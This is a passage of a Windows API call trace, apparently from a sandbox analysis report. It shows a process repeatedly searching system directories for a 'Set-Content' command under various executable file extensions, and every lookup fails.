lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.566] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.EXE" (normalized: "c:\\windows\\system32\\set-content.exe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.567] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.BAT" (normalized: "c:\\windows\\system32\\set-content.bat"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.567] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.568] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.CMD" (normalized: "c:\\windows\\system32\\set-content.cmd"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.569] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.VBS" (normalized: "c:\\windows\\system32\\set-content.vbs"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.569] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.569] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.VBE" (normalized: "c:\\windows\\system32\\set-content.vbe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.570] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.570] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.570] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.JS" (normalized: "c:\\windows\\system32\\set-content.js"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.571] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.571] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.JSE" (normalized: "c:\\windows\\system32\\set-content.jse"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.571] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.571] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.572] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.WSF" (normalized: "c:\\windows\\system32\\set-content.wsf"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.572] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.572] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.572] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.572] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.573] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.WSH" (normalized: "c:\\windows\\system32\\set-content.wsh"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.573] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.573] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.573] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.MSC" (normalized: "c:\\windows\\system32\\set-content.msc"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.574] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.574] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content.CPL" (normalized: "c:\\windows\\system32\\set-content.cpl"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.574] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.574] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.574] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.575] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf91084a6, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf91084a6, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0168.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.575] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0168.575] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-Content" (normalized: "c:\\windows\\system32\\set-content"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.575] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.575] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.575] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.575] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.575] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.576] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.ps1" (normalized: "c:\\windows\\set-content.ps1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d3f0) returned 1 [0168.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d390) returned 1 [0168.576] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3a0) returned 1 [0168.576] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xe782115b, ftLastAccessTime.dwHighDateTime=0x1da42d4, ftLastWriteTime.dwLowDateTime=0xe782115b, ftLastWriteTime.dwHighDateTime=0x1da42d4, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0168.576] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8d360) returned 1 [0168.576] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8d3f0) returned 1 [0168.576] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0168.576] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-Content.psm1" (normalized: "c:\\windows\\set-content.psm1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, 